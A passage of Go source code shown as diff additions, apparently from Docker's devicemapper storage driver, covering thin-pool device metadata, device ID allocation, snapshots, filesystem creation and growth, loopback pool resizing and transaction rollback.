transaction ID: %s", err) + } + devices.TransactionID = devices.OpenTransactionID + return nil +} + +func (devices *DeviceSet) removeMetadata(info *devInfo) error { + if err := os.RemoveAll(devices.metadataFile(info)); err != nil { + return fmt.Errorf("devmapper: Error removing metadata file %s: %s", devices.metadataFile(info), err) + } + return nil +} + +// Given json data and file path, write it to disk +func (devices *DeviceSet) writeMetaFile(jsonData []byte, filePath string) error { + tmpFile, err := ioutil.TempFile(devices.metadataDir(), ".tmp") + if err != nil { + return fmt.Errorf("devmapper: Error creating metadata file: %s", err) + } + + n, err := tmpFile.Write(jsonData) + if err != nil { + return fmt.Errorf("devmapper: Error writing metadata to %s: %s", tmpFile.Name(), err) + } + if n < len(jsonData) { + return io.ErrShortWrite + } + if err := tmpFile.Sync(); err != nil { + return fmt.Errorf("devmapper: Error syncing metadata file %s: %s", tmpFile.Name(), err) + } + if err := tmpFile.Close(); err != nil { + return fmt.Errorf("devmapper: Error closing metadata file %s: %s", tmpFile.Name(), err) + } + if err := os.Rename(tmpFile.Name(), filePath); err != nil { + return fmt.Errorf("devmapper: Error committing metadata file %s: %s", tmpFile.Name(), err) + } + + return nil +} + +func (devices *DeviceSet) saveMetadata(info *devInfo) error { + jsonData, err := json.Marshal(info) + if err != nil { + return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err) + } + if err := devices.writeMetaFile(jsonData, devices.metadataFile(info)); err != nil { + return err + } + return nil +} + +func (devices *DeviceSet) markDeviceIDUsed(deviceID int) { + var mask byte + i := deviceID % 8 + mask = 1 << uint(i) + devices.deviceIDMap[deviceID/8] = devices.deviceIDMap[deviceID/8] | mask +} + +func (devices *DeviceSet) markDeviceIDFree(deviceID int) { + var mask byte + i := deviceID % 8 + mask = ^(1 << uint(i)) + devices.deviceIDMap[deviceID/8] = devices.deviceIDMap[deviceID/8] & mask +} + +func (devices *DeviceSet) isDeviceIDFree(deviceID int) bool { + var mask byte + i := deviceID % 8 + mask = (1 << uint(i)) + if (devices.deviceIDMap[deviceID/8] & mask) != 0 { + return false + } + return true +} + +// Should be called with devices.Lock() held. +func (devices *DeviceSet) lookupDevice(hash string) (*devInfo, error) { + info := devices.Devices[hash] + if info == nil { + info = devices.loadMetadata(hash) + if info == nil { + return nil, fmt.Errorf("devmapper: Unknown device %s", hash) + } + + devices.Devices[hash] = info + } + return info, nil +} + +func (devices *DeviceSet) lookupDeviceWithLock(hash string) (*devInfo, error) { + devices.Lock() + defer devices.Unlock() + info, err := devices.lookupDevice(hash) + return info, err +} + +// This function relies on that device hash map has been loaded in advance. +// Should be called with devices.Lock() held. +func (devices *DeviceSet) constructDeviceIDMap() { + logrus.Debug("devmapper: constructDeviceIDMap()") + defer logrus.Debug("devmapper: constructDeviceIDMap() END") + + for _, info := range devices.Devices { + devices.markDeviceIDUsed(info.DeviceID) + logrus.Debugf("devmapper: Added deviceId=%d to DeviceIdMap", info.DeviceID) + } +} + +func (devices *DeviceSet) deviceFileWalkFunction(path string, finfo os.FileInfo) error { + + // Skip some of the meta files which are not device files. + if strings.HasSuffix(finfo.Name(), ".migrated") { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + if strings.HasPrefix(finfo.Name(), ".") { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + if finfo.Name() == deviceSetMetaFile { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + if finfo.Name() == transactionMetaFile { + logrus.Debugf("devmapper: Skipping file %s", path) + return nil + } + + logrus.Debugf("devmapper: Loading data for file %s", path) + + hash := finfo.Name() + if hash == "base" { + hash = "" + } + + // Include deleted devices also as cleanup delete device logic + // will go through it and see if there are any deleted devices. + if _, err := devices.lookupDevice(hash); err != nil { + return fmt.Errorf("devmapper: Error looking up device %s:%v", hash, err) + } + + return nil +} + +func (devices *DeviceSet) loadDeviceFilesOnStart() error { + logrus.Debug("devmapper: loadDeviceFilesOnStart()") + defer logrus.Debug("devmapper: loadDeviceFilesOnStart() END") + + var scan = func(path string, info os.FileInfo, err error) error { + if err != nil { + logrus.Debugf("devmapper: Can't walk the file %s", path) + return nil + } + + // Skip any directories + if info.IsDir() { + return nil + } + + return devices.deviceFileWalkFunction(path, info) + } + + return filepath.Walk(devices.metadataDir(), scan) +} + +// Should be called with devices.Lock() held. +func (devices *DeviceSet) unregisterDevice(id int, hash string) error { + logrus.Debugf("devmapper: unregisterDevice(%v, %v)", id, hash) + info := &devInfo{ + Hash: hash, + DeviceID: id, + } + + delete(devices.Devices, hash) + + if err := devices.removeMetadata(info); err != nil { + logrus.Debugf("devmapper: Error removing metadata: %s", err) + return err + } + + return nil +} + +// Should be called with devices.Lock() held. +func (devices *DeviceSet) registerDevice(id int, hash string, size uint64, transactionID uint64) (*devInfo, error) { + logrus.Debugf("devmapper: registerDevice(%v, %v)", id, hash) + info := &devInfo{ + Hash: hash, + DeviceID: id, + Size: size, + TransactionID: transactionID, + Initialized: false, + devices: devices, + } + + devices.Devices[hash] = info + + if err := devices.saveMetadata(info); err != nil { + // Try to remove unused device + delete(devices.Devices, hash) + return nil, err + } + + return info, nil +} + +func (devices *DeviceSet) activateDeviceIfNeeded(info *devInfo, ignoreDeleted bool) error { + logrus.Debugf("devmapper: activateDeviceIfNeeded(%v)", info.Hash) + + if info.Deleted && !ignoreDeleted { + return fmt.Errorf("devmapper: Can't activate device %v as it is marked for deletion", info.Hash) + } + + // Make sure deferred removal on device is canceled, if one was + // scheduled. + if err := devices.cancelDeferredRemovalIfNeeded(info); err != nil { + return fmt.Errorf("devmapper: Device Deferred Removal Cancellation Failed: %s", err) + } + + if devinfo, _ := devicemapper.GetInfo(info.Name()); devinfo != nil && devinfo.Exists != 0 { + return nil + } + + return devicemapper.ActivateDevice(devices.getPoolDevName(), info.Name(), info.DeviceID, info.Size) +} + +// Return true only if kernel supports xfs and mkfs.xfs is available +func xfsSupported() bool { + // Make sure mkfs.xfs is available + if _, err := exec.LookPath("mkfs.xfs"); err != nil { + return false + } + + // Check if kernel supports xfs filesystem or not. + exec.Command("modprobe", "xfs").Run() + + f, err := os.Open("/proc/filesystems") + if err != nil { + logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) + return false + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if strings.HasSuffix(s.Text(), "\txfs") { + return true + } + } + + if err := s.Err(); err != nil { + logrus.Warnf("devmapper: Could not check if xfs is supported: %v", err) + } + return false +} + +func determineDefaultFS() string { + if xfsSupported() { + return "xfs" + } + + logrus.Warn("devmapper: XFS is not supported in your system. Either the kernel doesn't support it or mkfs.xfs is not in your PATH. Defaulting to ext4 filesystem") + return "ext4" +} + +func (devices *DeviceSet) createFilesystem(info *devInfo) (err error) { + devname := info.DevName() + + args := []string{} + args = append(args, devices.mkfsArgs...) + + args = append(args, devname) + + if devices.filesystem == "" { + devices.filesystem = determineDefaultFS() + } + if err := devices.saveBaseDeviceFilesystem(devices.filesystem); err != nil { + return err + } + + logrus.Infof("devmapper: Creating filesystem %s on device %s", devices.filesystem, info.Name()) + defer func() { + if err != nil { + logrus.Infof("devmapper: Error while creating filesystem %s on device %s: %v", devices.filesystem, info.Name(), err) + } else { + logrus.Infof("devmapper: Successfully created filesystem %s on device %s", devices.filesystem, info.Name()) + } + }() + + switch devices.filesystem { + case "xfs": + err = exec.Command("mkfs.xfs", args...).Run() + case "ext4": + err = exec.Command("mkfs.ext4", append([]string{"-E", "nodiscard,lazy_itable_init=0,lazy_journal_init=0"}, args...)...).Run() + if err != nil { + err = exec.Command("mkfs.ext4", append([]string{"-E", "nodiscard,lazy_itable_init=0"}, args...)...).Run() + } + if err != nil { + return err + } + err = exec.Command("tune2fs", append([]string{"-c", "-1", "-i", "0"}, devname)...).Run() + default: + err = fmt.Errorf("devmapper: Unsupported filesystem type %s", devices.filesystem) + } + return +} + +func (devices *DeviceSet) migrateOldMetaData() error { + // Migrate old metadata file + jsonData, err := ioutil.ReadFile(devices.oldMetadataFile()) + if err != nil && !os.IsNotExist(err) { + return err + } + + if jsonData != nil { + m := metaData{Devices: make(map[string]*devInfo)} + + if err := json.Unmarshal(jsonData, &m); err != nil { + return err + } + + for hash, info := range m.Devices { + info.Hash = hash + devices.saveMetadata(info) + } + if err := os.Rename(devices.oldMetadataFile(), devices.oldMetadataFile()+".migrated"); err != nil { + return err + } + + } + + return nil +} + +// Cleanup deleted devices. It assumes that all the devices have been +// loaded in the hash table. +func (devices *DeviceSet) cleanupDeletedDevices() error { + devices.Lock() + + // If there are no deleted devices, there is nothing to do. + if devices.nrDeletedDevices == 0 { + devices.Unlock() + return nil + } + + var deletedDevices []*devInfo + + for _, info := range devices.Devices { + if !info.Deleted { + continue + } + logrus.Debugf("devmapper: Found deleted device %s.", info.Hash) + deletedDevices = append(deletedDevices, info) + } + + // Delete the deleted devices. DeleteDevice() first takes the info lock + // and then devices.Lock(). So drop it to avoid deadlock. + devices.Unlock() + + for _, info := range deletedDevices { + // This will again try deferred deletion. + if err := devices.DeleteDevice(info.Hash, false); err != nil { + logrus.Warnf("devmapper: Deletion of device %s, device_id=%v failed:%v", info.Hash, info.DeviceID, err) + } + } + + return nil +} + +func (devices *DeviceSet) countDeletedDevices() { + for _, info := range devices.Devices { + if !info.Deleted { + continue + } + devices.nrDeletedDevices++ + } +} + +func (devices *DeviceSet) startDeviceDeletionWorker() { + // Deferred deletion is not enabled. Don't do anything. + if !devices.deferredDelete { + return + } + + logrus.Debug("devmapper: Worker to cleanup deleted devices started") + for range devices.deletionWorkerTicker.C { + devices.cleanupDeletedDevices() + } +} + +func (devices *DeviceSet) initMetaData() error { + devices.Lock() + defer devices.Unlock() + + if err := devices.migrateOldMetaData(); err != nil { + return err + } + + _, transactionID, _, _, _, _, err := devices.poolStatus() + if err != nil { + return err + } + + devices.TransactionID = transactionID + + if err := devices.loadDeviceFilesOnStart(); err != nil { + return fmt.Errorf("devmapper: Failed to load device files:%v", err) + } + + devices.constructDeviceIDMap() + devices.countDeletedDevices() + + if err := devices.processPendingTransaction(); err != nil { + return err + } + + // Start a goroutine to cleanup Deleted Devices + go devices.startDeviceDeletionWorker() + return nil +} + +func (devices *DeviceSet) incNextDeviceID() { + // IDs are 24bit, so wrap around + devices.NextDeviceID = (devices.NextDeviceID + 1) & maxDeviceID +} + +func (devices *DeviceSet) getNextFreeDeviceID() (int, error) { + devices.incNextDeviceID() + for i := 0; i <= maxDeviceID; i++ { + if devices.isDeviceIDFree(devices.NextDeviceID) { + devices.markDeviceIDUsed(devices.NextDeviceID) + return devices.NextDeviceID, nil + } + devices.incNextDeviceID() + } + + return 0, fmt.Errorf("devmapper: Unable to find a free device ID") +} + +func (devices *DeviceSet) poolHasFreeSpace() error { + if devices.minFreeSpacePercent == 0 { + return nil + } + + _, _, dataUsed, dataTotal, metadataUsed, metadataTotal, err := devices.poolStatus() + if err != nil { + return err + } + + minFreeData := (dataTotal * uint64(devices.minFreeSpacePercent)) / 100 + if minFreeData < 1 { + minFreeData = 1 + } + dataFree := dataTotal - dataUsed + if dataFree < minFreeData { + return fmt.Errorf("devmapper: Thin Pool has %v free data blocks which is less than minimum required %v free data blocks. Create more free space in thin pool or use dm.min_free_space option to change behavior", (dataTotal - dataUsed), minFreeData) + } + + minFreeMetadata := (metadataTotal * uint64(devices.minFreeSpacePercent)) / 100 + if minFreeMetadata < 1 { + minFreeMetadata = 1 + } + + metadataFree := metadataTotal - metadataUsed + if metadataFree < minFreeMetadata { + return fmt.Errorf("devmapper: Thin Pool has %v free metadata blocks which is less than minimum required %v free metadata blocks. Create more free metadata space in thin pool or use dm.min_free_space option to change behavior", (metadataTotal - metadataUsed), minFreeMetadata) + } + + return nil +} + +func (devices *DeviceSet) createRegisterDevice(hash string) (*devInfo, error) { + devices.Lock() + defer devices.Unlock() + + deviceID, err := devices.getNextFreeDeviceID() + if err != nil { + return nil, err + } + + if err := devices.openTransaction(hash, deviceID); err != nil { + logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + devices.markDeviceIDFree(deviceID) + return nil, err + } + + for { + if err := devicemapper.CreateDevice(devices.getPoolDevName(), deviceID); err != nil { + if devicemapper.DeviceIDExists(err) { + // Device ID already exists. This should not + // happen. Now we have a mechanism to find + // a free device ID. So something is not right. + // Give a warning and continue. + logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + deviceID, err = devices.getNextFreeDeviceID() + if err != nil { + return nil, err + } + // Save new device id into transaction + devices.refreshTransaction(deviceID) + continue + } + logrus.Debugf("devmapper: Error creating device: %s", err) + devices.markDeviceIDFree(deviceID) + return nil, err + } + break + } + + logrus.Debugf("devmapper: Registering device (id %v) with FS size %v", deviceID, devices.baseFsSize) + info, err := devices.registerDevice(deviceID, hash, devices.baseFsSize, devices.OpenTransactionID) + if err != nil { + _ = devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + return nil, err + } + + if err := devices.closeTransaction(); err != nil { + devices.unregisterDevice(deviceID, hash) + devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + return nil, err + } + return info, nil +} + +func (devices *DeviceSet) takeSnapshot(hash string, baseInfo *devInfo, size uint64) error { + var ( + devinfo *devicemapper.Info + err error + ) + + if err = devices.poolHasFreeSpace(); err != nil { + return err + } + + if devices.deferredRemove { + devinfo, err = devicemapper.GetInfoWithDeferred(baseInfo.Name()) + if err != nil { + return err + } + if devinfo != nil && devinfo.DeferredRemove != 0 { + err = devices.cancelDeferredRemoval(baseInfo) + if err != nil { + // If Error is ErrEnxio. Device is probably already gone. Continue. + if err != devicemapper.ErrEnxio { + return err + } + } else { + defer devices.deactivateDevice(baseInfo) + } + } + } else { + devinfo, err = devicemapper.GetInfo(baseInfo.Name()) + if err != nil { + return err + } + } + + doSuspend := devinfo != nil && devinfo.Exists != 0 + + if doSuspend { + if err = devicemapper.SuspendDevice(baseInfo.Name()); err != nil { + return err + } + defer devicemapper.ResumeDevice(baseInfo.Name()) + } + + if err = devices.createRegisterSnapDevice(hash, baseInfo, size); err != nil { + return err + } + + return nil +} + +func (devices *DeviceSet) createRegisterSnapDevice(hash string, baseInfo *devInfo, size uint64) error { + deviceID, err := devices.getNextFreeDeviceID() + if err != nil { + return err + } + + if err := devices.openTransaction(hash, deviceID); err != nil { + logrus.Debugf("devmapper: Error opening transaction hash = %s deviceID = %d", hash, deviceID) + devices.markDeviceIDFree(deviceID) + return err + } + + for { + if err := devicemapper.CreateSnapDeviceRaw(devices.getPoolDevName(), deviceID, baseInfo.DeviceID); err != nil { + if devicemapper.DeviceIDExists(err) { + // Device ID already exists. This should not + // happen. Now we have a mechanism to find + // a free device ID. So something is not right. + // Give a warning and continue. + logrus.Errorf("devmapper: Device ID %d exists in pool but it is supposed to be unused", deviceID) + deviceID, err = devices.getNextFreeDeviceID() + if err != nil { + return err + } + // Save new device id into transaction + devices.refreshTransaction(deviceID) + continue + } + logrus.Debugf("devmapper: Error creating snap device: %s", err) + devices.markDeviceIDFree(deviceID) + return err + } + break + } + + if _, err := devices.registerDevice(deviceID, hash, size, devices.OpenTransactionID); err != nil { + devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + logrus.Debugf("devmapper: Error registering device: %s", err) + return err + } + + if err := devices.closeTransaction(); err != nil { + devices.unregisterDevice(deviceID, hash) + devicemapper.DeleteDevice(devices.getPoolDevName(), deviceID) + devices.markDeviceIDFree(deviceID) + return err + } + return nil +} + +func (devices *DeviceSet) loadMetadata(hash string) *devInfo { + info := &devInfo{Hash: hash, devices: devices} + + jsonData, err := ioutil.ReadFile(devices.metadataFile(info)) + if err != nil { + logrus.Debugf("devmapper: Failed to read %s with err: %v", devices.metadataFile(info), err) + return nil + } + + if err := json.Unmarshal(jsonData, &info); err != nil { + logrus.Debugf("devmapper: Failed to unmarshal devInfo from %s with err: %v", devices.metadataFile(info), err) + return nil + } + + if info.DeviceID > maxDeviceID { + logrus.Errorf("devmapper: Ignoring Invalid DeviceId=%d", info.DeviceID) + return nil + } + + return info +} + +func getDeviceUUID(device string) (string, error) { + out, err := exec.Command("blkid", "-s", "UUID", "-o", "value", device).Output() + if err != nil { + return "", fmt.Errorf("devmapper: Failed to find uuid for device %s:%v", device, err) + } + + uuid := strings.TrimSuffix(string(out), "\n") + uuid = strings.TrimSpace(uuid) + logrus.Debugf("devmapper: UUID for device: %s is:%s", device, uuid) + return uuid, nil +} + +func (devices *DeviceSet) getBaseDeviceSize() uint64 { + info, _ := devices.lookupDevice("") + if info == nil { + return 0 + } + return info.Size +} + +func (devices *DeviceSet) getBaseDeviceFS() string { + return devices.BaseDeviceFilesystem +} + +func (devices *DeviceSet) verifyBaseDeviceUUIDFS(baseInfo *devInfo) error { + devices.Lock() + defer devices.Unlock() + + if err := devices.activateDeviceIfNeeded(baseInfo, false); err != nil { + return err + } + defer devices.deactivateDevice(baseInfo) + + uuid, err := getDeviceUUID(baseInfo.DevName()) + if err != nil { + return err + } + + if devices.BaseDeviceUUID != uuid { + return fmt.Errorf("devmapper: Current Base Device UUID:%s does not match with stored UUID:%s. Possibly using a different thin pool than last invocation", uuid, devices.BaseDeviceUUID) + } + + if devices.BaseDeviceFilesystem == "" { + fsType, err := ProbeFsType(baseInfo.DevName()) + if err != nil { + return err + } + if err := devices.saveBaseDeviceFilesystem(fsType); err != nil { + return err + } + } + + // If user specified a filesystem using dm.fs option and current + // file system of base image is not same, warn user that dm.fs + // will be ignored. + if devices.BaseDeviceFilesystem != devices.filesystem { + logrus.Warnf("devmapper: Base device already exists and has filesystem %s on it. User specified filesystem %s will be ignored.", devices.BaseDeviceFilesystem, devices.filesystem) + devices.filesystem = devices.BaseDeviceFilesystem + } + return nil +} + +func (devices *DeviceSet) saveBaseDeviceFilesystem(fs string) error { + devices.BaseDeviceFilesystem = fs + return devices.saveDeviceSetMetaData() +} + +func (devices *DeviceSet) saveBaseDeviceUUID(baseInfo *devInfo) error { + devices.Lock() + defer devices.Unlock() + + if err := devices.activateDeviceIfNeeded(baseInfo, false); err != nil { + return err + } + defer devices.deactivateDevice(baseInfo) + + uuid, err := getDeviceUUID(baseInfo.DevName()) + if err != nil { + return err + } + + devices.BaseDeviceUUID = uuid + return devices.saveDeviceSetMetaData() +} + +func (devices *DeviceSet) createBaseImage() error { + logrus.Debug("devmapper: Initializing base device-mapper thin volume") + + // Create initial device + info, err := devices.createRegisterDevice("") + if err != nil { + return err + } + + logrus.Debug("devmapper: Creating filesystem on base device-mapper thin volume") + + if err := devices.activateDeviceIfNeeded(info, false); err != nil { + return err + } + + if err := devices.createFilesystem(info); err != nil { + return err + } + + info.Initialized = true + if err := devices.saveMetadata(info); err != nil { + info.Initialized = false + return err + } + + if err := devices.saveBaseDeviceUUID(info); err != nil { + return fmt.Errorf("devmapper: Could not query and save base device UUID:%v", err) + } + + return nil +} + +// Returns if thin pool device exists or not. If device exists, also makes +// sure it is a thin pool device and not some other type of device. +func (devices *DeviceSet) thinPoolExists(thinPoolDevice string) (bool, error) { + logrus.Debugf("devmapper: Checking for existence of the pool %s", thinPoolDevice) + + info, err := devicemapper.GetInfo(thinPoolDevice) + if err != nil { + return false, fmt.Errorf("devmapper: GetInfo() on device %s failed: %v", thinPoolDevice, err) + } + + // Device does not exist. + if info.Exists == 0 { + return false, nil + } + + _, _, deviceType, _, err := devicemapper.GetStatus(thinPoolDevice) + if err != nil { + return false, fmt.Errorf("devmapper: GetStatus() on device %s failed: %v", thinPoolDevice, err) + } + + if deviceType != "thin-pool" { + return false, fmt.Errorf("devmapper: Device %s is not a thin pool", thinPoolDevice) + } + + return true, nil +} + +func (devices *DeviceSet) checkThinPool() error { + _, transactionID, dataUsed, _, _, _, err := devices.poolStatus() + if err != nil { + return err + } + if dataUsed != 0 { + return fmt.Errorf("devmapper: Unable to take ownership of thin-pool (%s) that already has used data blocks", + devices.thinPoolDevice) + } + if transactionID != 0 { + return fmt.Errorf("devmapper: Unable to take ownership of thin-pool (%s) with non-zero transaction ID", + devices.thinPoolDevice) + } + return nil +} + +// Base image is initialized properly. Either save UUID for first time (for +// upgrade case or verify UUID. +func (devices *DeviceSet) setupVerifyBaseImageUUIDFS(baseInfo *devInfo) error { + // If BaseDeviceUUID is nil (upgrade case), save it and return success. + if devices.BaseDeviceUUID == "" { + if err := devices.saveBaseDeviceUUID(baseInfo); err != nil { + return fmt.Errorf("devmapper: Could not query and save base device UUID:%v", err) + } + return nil + } + + if err := devices.verifyBaseDeviceUUIDFS(baseInfo); err != nil { + return fmt.Errorf("devmapper: Base Device UUID and Filesystem verification failed: %v", err) + } + + return nil +} + +func (devices *DeviceSet) checkGrowBaseDeviceFS(info *devInfo) error { + + if !userBaseSize { + return nil + } + + if devices.baseFsSize < devices.getBaseDeviceSize() { + return fmt.Errorf("devmapper: Base device size cannot be smaller than %s", units.HumanSize(float64(devices.getBaseDeviceSize()))) + } + + if devices.baseFsSize == devices.getBaseDeviceSize() { + return nil + } + + info.lock.Lock() + defer info.lock.Unlock() + + devices.Lock() + defer devices.Unlock() + + info.Size = devices.baseFsSize + + if err := devices.saveMetadata(info); err != nil { + // Try to remove unused device + delete(devices.Devices, info.Hash) + return err + } + + return devices.growFS(info) +} + +func (devices *DeviceSet) growFS(info *devInfo) error { + if err := devices.activateDeviceIfNeeded(info, false); err != nil { + return fmt.Errorf("Error activating devmapper device: %s", err) + } + + defer devices.deactivateDevice(info) + + fsMountPoint := "/run/docker/mnt" + if _, err := os.Stat(fsMountPoint); os.IsNotExist(err) { + if err := os.MkdirAll(fsMountPoint, 0700); err != nil { + return err + } + defer os.RemoveAll(fsMountPoint) + } + + options := "" + if devices.BaseDeviceFilesystem == "xfs" { + // XFS needs nouuid or it can't mount filesystems with the same fs + options = joinMountOptions(options, "nouuid") + } + options = joinMountOptions(options, devices.mountOptions) + + if err := mount.Mount(info.DevName(), fsMountPoint, devices.BaseDeviceFilesystem, options); err != nil { + return fmt.Errorf("Error mounting '%s' on '%s': %s", info.DevName(), fsMountPoint, err) + } + + defer syscall.Unmount(fsMountPoint, syscall.MNT_DETACH) + + switch devices.BaseDeviceFilesystem { + case "ext4": + if out, err := exec.Command("resize2fs", info.DevName()).CombinedOutput(); err != nil { + return fmt.Errorf("Failed to grow rootfs:%v:%s", err, string(out)) + } + case "xfs": + if out, err := exec.Command("xfs_growfs", info.DevName()).CombinedOutput(); err != nil { + return fmt.Errorf("Failed to grow rootfs:%v:%s", err, string(out)) + } + default: + return fmt.Errorf("Unsupported filesystem type %s", devices.BaseDeviceFilesystem) + } + return nil +} + +func (devices *DeviceSet) setupBaseImage() error { + oldInfo, _ := devices.lookupDeviceWithLock("") + + // base image already exists. If it is initialized properly, do UUID + // verification and return. Otherwise remove image and set it up + // fresh. + + if oldInfo != nil { + if oldInfo.Initialized && !oldInfo.Deleted { + if err := devices.setupVerifyBaseImageUUIDFS(oldInfo); err != nil { + return err + } + + if err := devices.checkGrowBaseDeviceFS(oldInfo); err != nil { + return err + } + + return nil + } + + logrus.Debug("devmapper: Removing uninitialized base image") + // If previous base device is in deferred delete state, + // that needs to be cleaned up first. So don't try + // deferred deletion. + if err := devices.DeleteDevice("", true); err != nil { + return err + } + } + + // If we are setting up base image for the first time, make sure + // thin pool is empty. + if devices.thinPoolDevice != "" && oldInfo == nil { + if err := devices.checkThinPool(); err != nil { + return err + } + } + + // Create new base image device + if err := devices.createBaseImage(); err != nil { + return err + } + + return nil +} + +func setCloseOnExec(name string) { + if fileInfos, _ := ioutil.ReadDir("/proc/self/fd"); fileInfos != nil { + for _, i := range fileInfos { + link, _ := os.Readlink(filepath.Join("/proc/self/fd", i.Name())) + if link == name { + fd, err := strconv.Atoi(i.Name()) + if err == nil { + syscall.CloseOnExec(fd) + } + } + } + } +} + +// DMLog implements logging using DevMapperLogger interface. +func (devices *DeviceSet) DMLog(level int, file string, line int, dmError int, message string) { + // By default libdm sends us all the messages including debug ones. + // We need to filter out messages here and figure out which one + // should be printed. + if level > logLevel { + return + } + + // FIXME(vbatts) push this back into ./pkg/devicemapper/ + if level <= devicemapper.LogLevelErr { + logrus.Errorf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) + } else if level <= devicemapper.LogLevelInfo { + logrus.Infof("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) + } else { + // FIXME(vbatts) push this back into ./pkg/devicemapper/ + logrus.Debugf("libdevmapper(%d): %s:%d (%d) %s", level, file, line, dmError, message) + } +} + +func major(device uint64) uint64 { + return (device >> 8) & 0xfff +} + +func minor(device uint64) uint64 { + return (device & 0xff) | ((device >> 12) & 0xfff00) +} + +// ResizePool increases the size of the pool. +func (devices *DeviceSet) ResizePool(size int64) error { + dirname := devices.loopbackDir() + datafilename := path.Join(dirname, "data") + if len(devices.dataDevice) > 0 { + datafilename = devices.dataDevice + } + metadatafilename := path.Join(dirname, "metadata") + if len(devices.metadataDevice) > 0 { + metadatafilename = devices.metadataDevice + } + + datafile, err := os.OpenFile(datafilename, os.O_RDWR, 0) + if datafile == nil { + return err + } + defer datafile.Close() + + fi, err := datafile.Stat() + if fi == nil { + return err + } + + if fi.Size() > size { + return fmt.Errorf("devmapper: Can't shrink file") + } + + dataloopback := loopback.FindLoopDeviceFor(datafile) + if dataloopback == nil { + return fmt.Errorf("devmapper: Unable to find loopback mount for: %s", datafilename) + } + defer dataloopback.Close() + + metadatafile, err := os.OpenFile(metadatafilename, os.O_RDWR, 0) + if metadatafile == nil { + return err + } + defer metadatafile.Close() + + metadataloopback := loopback.FindLoopDeviceFor(metadatafile) + if metadataloopback == nil { + return fmt.Errorf("devmapper: Unable to find loopback mount for: %s", metadatafilename) + } + defer metadataloopback.Close() + + // Grow loopback file + if err := datafile.Truncate(size); err != nil { + return fmt.Errorf("devmapper: Unable to grow loopback file: %s", err) + } + + // Reload size for loopback device + if err := loopback.SetCapacity(dataloopback); err != nil { + return fmt.Errorf("Unable to update loopback capacity: %s", err) + } + + // Suspend the pool + if err := devicemapper.SuspendDevice(devices.getPoolName()); err != nil { + return fmt.Errorf("devmapper: Unable to suspend pool: %s", err) + } + + // Reload with the new block sizes + if err := devicemapper.ReloadPool(devices.getPoolName(), dataloopback, metadataloopback, devices.thinpBlockSize); err != nil { + return fmt.Errorf("devmapper: Unable to reload pool: %s", err) + } + + // Resume the pool + if err := devicemapper.ResumeDevice(devices.getPoolName()); err != nil { + return fmt.Errorf("devmapper: Unable to resume pool: %s", err) + } + + return nil +} + +func (devices *DeviceSet) loadTransactionMetaData() error { + jsonData, err := ioutil.ReadFile(devices.transactionMetaFile()) + if err != nil { + // There is no active transaction. This will be the case + // during upgrade. + if os.IsNotExist(err) { + devices.OpenTransactionID = devices.TransactionID + return nil + } + return err + } + + json.Unmarshal(jsonData, &devices.transaction) + return nil +} + +func (devices *DeviceSet) saveTransactionMetaData() error { + jsonData, err := json.Marshal(&devices.transaction) + if err != nil { + return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err) + } + + return devices.writeMetaFile(jsonData, devices.transactionMetaFile()) +} + +func (devices *DeviceSet) removeTransactionMetaData() error { + if err := os.RemoveAll(devices.transactionMetaFile()); err != nil { + return err + } + return nil +} + +func (devices *DeviceSet) rollbackTransaction() error { + logrus.Debugf("devmapper: Rolling back open transaction: TransactionID=%d hash=%s device_id=%d", devices.OpenTransactionID, devices.DeviceIDHash, devices.DeviceID) + + // A device id might have already been deleted before transaction + // closed. In that case this call will fail. Just leave a message + // in case of failure. + if err := devicemapper.DeleteDevice(devices.getPoolDevName(), devices.DeviceID); err != nil { + logrus.Errorf("devmapper: Unable to delete device: %s", err) + } + + dinfo := &devInfo{Hash: devices.DeviceIDHash} + if err := devices.removeMetadata(dinfo); err != nil { + logrus.Errorf("devmapper: Unable to remove metadata: %s", err) + } else { + devices.markDeviceIDFree(devices.DeviceID) + } + + if err := devices.removeTransactionMetaData(); err != nil { + logrus.Errorf("devmapper: Unable to remove transaction meta file %s: %s", devices.transactionMetaFile(), err) + } + + return nil +} + +func (devices *DeviceSet) processPendingTransaction() error { + if err := devices.loadTransactionMetaData(); err != nil { + return err + } + + // If there was open transaction but pool transaction ID is same + // as open transaction ID, nothing to roll back. + if devices.TransactionID == devices.OpenTransactionID { + return nil + } + + // If open transaction ID is less than pool transaction ID, something + // is wrong. Bail out. + if devices.OpenTransactionID < devices.TransactionID { + logrus.Errorf("devmapper: Open Transaction id %d is less than pool transaction id %d", devices.OpenTransactionID, devices.TransactionID) + return nil + } + + // Pool transaction ID is not same as open transaction. There is + // a transaction which was not completed. + if err := devices.rollbackTransaction(); err != nil { + return fmt.Errorf("devmapper: Rolling back open transaction failed: %s", err) + } + + devices.OpenTransactionID = devices.TransactionID + return nil +} + +func (devices *DeviceSet) loadDeviceSetMetaData() error { + jsonData, err := ioutil.ReadFile(devices.deviceSetMetaFile()) + if err != nil { + // For backward compatibility return success if file does + // not exist. + if os.IsNotExist(err) { + return nil + } + return err + } + + return json.Unmarshal(jsonData, devices) +} + +func (devices *DeviceSet) saveDeviceSetMetaData() error { + jsonData, err := json.Marshal(devices) + if err != nil { + return fmt.Errorf("devmapper: Error encoding metadata to json: %s", err) + } + + return devices.writeMetaFile(jsonData, devices.deviceSetMetaFile()) +} + +func (devices *DeviceSet) openTransaction(hash string, DeviceID int) error { + devices.allocateTransactionID() + devices.DeviceIDHash = hash + devices.DeviceID = DeviceID + if err := devices.saveTransactionMetaData(); err != nil { + return fmt.Errorf("devmapper: Error saving transaction metadata: %s", err) + } + return nil +} + +func (devices *DeviceSet) refreshTransaction(DeviceID int) error { + devices.DeviceID = DeviceID + if err := devices.saveTransactionMetaData(); err != nil { + return 